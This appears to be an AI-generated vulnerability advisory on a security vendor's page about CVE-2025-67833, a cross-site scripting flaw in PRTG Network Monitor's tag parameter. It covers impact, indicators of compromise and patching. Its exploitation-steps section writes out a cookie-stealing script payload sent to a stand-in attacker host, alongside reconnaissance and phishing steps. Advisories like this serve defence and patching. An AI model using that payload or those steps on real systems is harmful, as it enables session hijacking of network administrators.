CVE-2025-67833
PRTG Network Monitor vulnerability analysis and mitigation

Overview

CVE-2025-67833 is a Cross-Site Scripting (XSS) vulnerability in Paessler PRTG Network Monitor that allows unauthenticated attackers to inject malicious scripts via the tag parameter. It affects all versions of PRTG Network Monitor prior to 25.4.114.1032. The CVE was published on January 14, 2026, with initial NVD analysis completed on January 20, 2026. It carries a CVSS v3.1 base score of 6.1 (Medium), assessed by CISA-ADP (Paessler Advisory, Red Hat CVE).

Technical details

The vulnerability is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-Site Scripting), rooted in insufficient sanitization of user-supplied input in the tag parameter of the PRTG web interface. An unauthenticated remote attacker can craft a malicious URL or request containing a JavaScript payload in the tag parameter; when a victim user visits or interacts with the crafted link, the script executes in their browser within the PRTG application context. The attack requires user interaction (e.g., clicking a malicious link) but no authentication or special privileges on the part of the attacker, and the scope is changed, indicating impact extends beyond the vulnerable component (Paessler Advisory, Red Hat CVE).

Impact

Successful exploitation could allow an attacker to steal authenticated user session tokens, harvest credentials, perform unauthorized actions on behalf of the victim within PRTG, or distribute malware to users of the monitoring platform. Because PRTG Network Monitor is typically used by network administrators to oversee critical infrastructure, session hijacking could provide an attacker with visibility into or control over monitored network devices. Confidentiality and integrity are both impacted at a low level per the CVSS assessment, with no direct availability impact (Paessler Advisory, Red Hat CVE).

Exploitability

As of the time of reporting, there is no public proof-of-concept exploit code and no evidence of active in-the-wild exploitation. The EPSS score is approximately 0.069%, indicating a low probability of exploitation in the near term. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. No threat actor attribution has been reported (Red Hat CVE).

Exploitation steps

  1. Reconnaissance: Identify internet-facing or internally accessible PRTG Network Monitor instances running versions prior to 25.4.114.1032 using tools like Shodan, Censys, or internal network scanning.
  2. Craft malicious payload: Construct a URL targeting the PRTG web interface that includes a JavaScript payload in the tag parameter (e.g., https://<prtg-host>/index.htm?tag=<script>document.location='https://attacker.com/steal?c='+document.cookie</script>).
  3. Deliver the link: Send the crafted URL to a PRTG user (e.g., an administrator) via phishing email, chat message, or other social engineering vector to induce them to click it.
  4. Script execution: When the victim loads the malicious URL in their browser while authenticated to PRTG, the injected script executes in the PRTG application context, exfiltrating session cookies or performing actions on behalf of the victim.
  5. Session hijacking: Use the stolen session token to authenticate to PRTG as the victim user, gaining access to network monitoring data, device configurations, and administrative functions (Paessler Advisory).

Indicators of compromise

  • Network: Outbound HTTP/S requests from a user's browser to unexpected external domains shortly after accessing PRTG, potentially carrying cookie or session data in query parameters.
  • Logs: PRTG web server access logs showing requests to PRTG endpoints with URL-encoded JavaScript or HTML tags in the tag parameter (e.g., %3Cscript%3E, <script>, onerror=, onload=).
  • Logs: Unusual PRTG login events from IP addresses or user agents inconsistent with the legitimate user's normal access patterns, potentially indicating session token reuse by an attacker.
  • Network: DNS queries or HTTP requests to attacker-controlled domains originating from workstations of PRTG administrators around the time of PRTG access.

Mitigation and workarounds

Paessler has released a patched version of PRTG Network Monitor; organizations should upgrade to version 25.4.114.1032 or later as the primary remediation (Paessler Advisory). As interim measures, restrict access to the PRTG web interface to trusted internal networks or VPN users only, and consider deploying Web Application Firewall (WAF) rules to filter malicious input in the tag parameter. Applying the principle of least privilege to PRTG user accounts can limit the impact of a successful session hijack.

Additional resources


SourceThis report was generated using AI

Related PRTG Network Monitor vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2025-67835MEDIUM6.5
  • PRTG Network Monitor logoPRTG Network Monitor
  • cpe:2.3:a:paessler:prtg_network_monitor
NoYesJan 14, 2026
CVE-2025-67833MEDIUM6.1
  • PRTG Network Monitor logoPRTG Network Monitor
  • cpe:2.3:a:paessler:prtg_network_monitor
NoYesJan 14, 2026
CVE-2024-12833MEDIUM6.1
  • PRTG Network Monitor logoPRTG Network Monitor
  • cpe:2.3:a:paessler:prtg_network_monitor
NoYesFeb 11, 2025
CVE-2023-51630MEDIUM6.1
  • PRTG Network Monitor logoPRTG Network Monitor
  • cpe:2.3:a:paessler:prtg_network_monitor
NoYesFeb 08, 2024
CVE-2025-67834MEDIUM5.4
  • PRTG Network Monitor logoPRTG Network Monitor
  • cpe:2.3:a:paessler:prtg_network_monitor
NoYesJan 14, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management